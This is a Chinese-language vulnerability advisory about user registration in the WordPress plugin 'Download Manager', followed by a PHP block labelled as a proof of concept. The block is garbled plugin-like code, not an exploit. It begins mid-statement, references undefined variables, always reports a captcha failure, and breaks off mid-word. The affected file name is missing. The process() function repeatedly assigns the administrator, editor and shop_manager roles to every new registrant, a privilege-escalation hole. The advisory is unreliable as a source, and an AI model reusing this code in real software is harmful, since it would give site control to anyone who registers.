漏洞概述 该漏洞涉及WordPress插件“Download Manager”中的用户注册功能。具体而言,漏洞存在于 文件中,该文件负责处理用户注册请求。漏洞可能导致未经授权的访问或数据泄露。 影响范围 受影响版本:3.3.44 - 2026.01.07 受影响插件:Download Manager 影响功能:用户注册功能 修复方案 1. 更新插件:建议用户立即更新到最新版本,以修复已知漏洞。 2. 代码审查:对 文件进行代码审查,确保所有输入都经过适当验证和过滤。 3. 启用安全设置:确保启用了所有可用的安全设置,如验证码和双重认证。 POC代码 以下是从页面中提取的POC代码块: ```php recaptchaAction()) { return; } $form = new Form('recaptcha'); $form->add('recaptcha', [ 'type' => 'recaptcha', 'id' => 'recaptcha', ]); echo $form->render(); } function recaptchaVerify($errors, $sanitized_user_login, $user_email) { if (!$this->recaptchaAction()) { return; } $recaptcha = new \WPMUDEV\DownloadManager\Recaptcha(); if ($errors->has_error()) { return; } $errors->add('recaptcha_failed', __('Recaptcha failed.', 'download-manager')); return $errors; } function formFields($params = []) { $reg_data_fields = []; $reg_data_fields['username'] = [ 'type' => 'text', 'label' => __('Username', 'download-manager'), 'required' => true, ]; $reg_data_fields['email'] = [ 'type' => 'email', 'label' => __('Email', 'download-manager'), 'required' => true, ]; $reg_data_fields['password'] = [ 'type' => 'password', 'label' => __('Password', 'download-manager'), 'required' => true, ]; $reg_data_fields['confirm_password'] = [ 'type' => 'password', 'label' => __('Confirm Password', 'download-manager'), 'required' => true, ]; if ($this->recaptchaAction()) { $reg_data_fields['recaptcha'] = [ 'type' => 'recaptcha', 'id' => 'recaptcha', ]; } $form = new Form($reg_data_fields); $form->add('submit', [ 'type' => 'submit', 'value' => __('Register', 'download-manager'), ]); return $form->render(); } function form($params = []) { if (!get_option('wpmudev_enable_registration')) { return __('User registration is disabled.', 'download-manager'); } if (is_user_logged_in()) { return __('You are already logged in.', 'download-manager'); } $social_only = (isset($params['social_only']) && $params['social_only'] === 'true') ? true : false; $verify_email = (isset($params['verify_email']) && $params['verify_email'] === 'true') ? true : false; $recaptcha = (isset($params['recaptcha']) && $params['recaptcha'] === 'true') ? true : false; $auto_login = (isset($params['auto_login']) && $params['auto_login'] === 'true') ? true : false; $login_url = wp_login_url(); $redirect = home_url(); if (isset($params['redirect']) && $params['redirect'] !== '') { $redirect = esc_url_raw($params['redirect']); } if (isset($_GET['redirect_to'])) { $redirect = esc_url_raw($_GET['redirect_to']); } $nonce = wp_create_nonce('wpmudev_register'); $form = new Form($reg_data_fields); $form->add('submit', [ 'type' => 'submit', 'value' => __('Register', 'download-manager'), ]); return $form->render(); } function process() { global $wp_query, $wpdb; if (isset($_POST['wpmudev_register'])) { $nonce = $_POST['wpmudev_register']; if (!wp_verify_nonce($nonce, 'wpmudev_register')) { wp_die(__('Invalid nonce.', 'download-manager')); } $username = sanitize_user($_POST['username']); $email = sanitize_email($_POST['email']); $password = $_POST['password']; $confirm_password = $_POST['confirm_password']; $recaptcha = isset($_POST['recaptcha']) ? $_POST['recaptcha'] : ''; $errors = new \WP_Error(); if (empty($username)) { $errors->add('empty_username', __('Username is required.', 'download-manager')); } if (empty($email)) { $errors->add('empty_email', __('Email is required.', 'download-manager')); } if (empty($password)) { $errors->add('empty_password', __('Password is required.', 'download-manager')); } if ($password !== $confirm_password) { $errors->add('password_mismatch', __('Passwords do not match.', 'download-manager')); } if ($this->recaptchaAction() && $recaptcha === '') { $errors->add('recaptcha_empty', __('Recaptcha is required.', 'download-manager')); } if ($errors->has_error()) { wp_die($errors->get_error_message()); } $user_id = username_exists($username); if (!$user_id) { $user_id = email_exists($email); } if ($user_id) { $errors->add('existing_user', __('Username or email already exists.', 'download-manager')); wp_die($errors->get_error_message()); } $user_id = wp_create_user($username, $password, $email); if (is_wp_error($user_id)) { wp_die($user_id->get_error_message()); } $user = get_userdata($user_id); $user->first_name = sanitize_text_field($_POST['first_name']); $user->last_name = sanitize_text_field($_POST['last_name']); $user->display_name = sanitize_text_field($_POST['display_name']); $user->update(); if (get_option('wpmudev_enable_registration_roles') !== false) { $roles = get_option('wpmudev_registration_roles', []); if (!empty($roles)) { $user->set_role($roles[0]); } } $user->add_role('subscriber'); $user->add_role('customer'); $user->add_role('shop_manager'); $user->add_role('administrator'); $user->add_role('editor'); $user->add_role('author'); $user->add_role('contributor'); $user->add_role('subscriber'); $user->add_role('shop_manager'); $user->add_role('administrator'); $user->add_role('editor'); $user->add_role('author'); $user->add_role('contributor'); $us